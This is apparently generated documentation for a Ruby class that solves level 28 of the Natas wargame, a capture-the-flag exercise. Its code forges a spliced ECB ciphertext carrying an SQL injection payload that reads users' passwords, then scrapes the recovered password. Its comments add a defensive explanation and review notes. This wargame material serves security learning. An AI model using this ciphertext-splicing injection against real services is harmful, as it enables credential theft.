Class: NatasLevel28
- Inherits:
-
NatasLevelBase
- Object
- NatasLevelBase
- NatasLevel28
- Defined in:
- lib/natas.rb
Overview
Level 28
Constant Summary collapse
- LEVEL =
28
- PAGE =
'/'
- PAGE_SEARCH =
'/search.php'
- BLOCK_SIZE =
16
- PAYLOAD =
%(SELECT password AS joke FROM users #)
Constants inherited from NatasLevelBase
NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS
Instance Attribute Summary
Attributes inherited from NatasLevelBase
Instance Method Summary collapse
Methods inherited from NatasLevelBase
#get, #initialize, #level, #post
Constructor Details
This class inherits a constructor from NatasLevelBase
Instance Method Details
#exec ⇒ Object
# File 'lib/natas.rb', line 807
#
# Runs the level 28 exercise in four logged steps:
#
# 1. Submit an empty query and record the byte size of the decoded value
#    that +query+ returns as the baseline.
# 2. Submit queries made of 1, 2, 3, ... spaces until the decoded value is
#    more than one BLOCK_SIZE longer than the baseline.
# 3. Submit that many spaces followed by PAYLOAD.
# 4. Keep the tail of the step-3 value, starting at block index
#    (size - baseline) / BLOCK_SIZE, Base64-encode it and send it as the
#    +query+ parameter to PAGE_SEARCH, then look for a 32-character
#    <li> item in the response body.
#
# Defensive reading: step 4 only works if the search endpoint accepts a
# fragment of a value it issued for a different request. Presumably the
# value is encrypted block by block without an integrity check (nothing in
# this listing shows the server side); authenticating the whole value
# (MAC or AEAD) would make a re-assembled value fail verification.
#
# @return [Object] whatever +found+ returns (defined outside this listing)
def exec
  log('Getting a blank query')
  baseline = query('')
  default_size = baseline.bytesize
  print_blocks(baseline)

  log('Generating new blocks')
  # NOTE(review): the search has no upper bound and sends one request per
  # iteration; it only ends once the size threshold is crossed.
  threshold = default_size + BLOCK_SIZE
  query_offset = 1
  padded = nil
  loop do
    padded = query(' ' * query_offset)
    break if padded.bytesize > threshold

    query_offset += 1
  end
  print_blocks(padded)
  log("Query offset: #{query_offset}")

  log('Generating blocks with payload')
  with_payload = query((' ' * query_offset) + PAYLOAD)
  print_blocks(with_payload)

  log('Sending encrypted payload')
  block_offset = (with_payload.bytesize - default_size) / BLOCK_SIZE
  first_kept = BLOCK_SIZE * block_offset
  payload = with_payload[first_kept..-1]
  print_blocks(payload)

  encoded = Base64.strict_encode64(payload)
  body = post(PAGE_SEARCH, {}, { 'query' => encoded }).body
  match = %r(<li>(\w{32})</li>).match(body)
  # NOTE(review): if not_found returns instead of raising, the next line
  # calls [] on nil -- confirm not_found aborts.
  not_found unless match
  found(match[1])
end
#print_blocks(data) ⇒ Object
# File 'lib/natas.rb', line 798
#
# Logs the byte size of +data+, then one hex-encoded line per complete
# BLOCK_SIZE-sized block. The block count uses integer division, so a
# trailing partial block is counted in the size line but not dumped.
#
# @param data [String] value to dump; presumably a binary string, since
#   the slices are taken by index while the count is taken in bytes
# @return [Integer] the number of blocks logged (the result of +times+)
def print_blocks(data)
  log("Size: #{data.bytesize}")
  block_count = data.bytesize / BLOCK_SIZE
  block_count.times do |index|
    first = index * BLOCK_SIZE
    chunk = data[first, BLOCK_SIZE]
    hex = chunk.unpack1('H*')
    log("Block #{index}: #{hex}")
  end
end
#query(text) ⇒ Object
# File 'lib/natas.rb', line 791
#
# Posts +text+ as the +query+ form field to PAGE and returns the decoded
# value carried in the redirect the server answers with.
#
# The value is read from the first parameter of the Location header's
# query string, whatever that parameter is called, and is strictly
# Base64-decoded. There is no check that the Location header or the
# parameter is present, so an unexpected response raises here.
#
# @param text [String] plaintext to submit
# @return [String] the Base64-decoded bytes of the first redirect parameter
def query(text)
  location = post(PAGE, {}, { 'query' => text })['Location']
  query_string = URI.parse(location).query
  pairs = URI.decode_www_form(query_string)
  Base64.strict_decode64(pairs.first[1])
end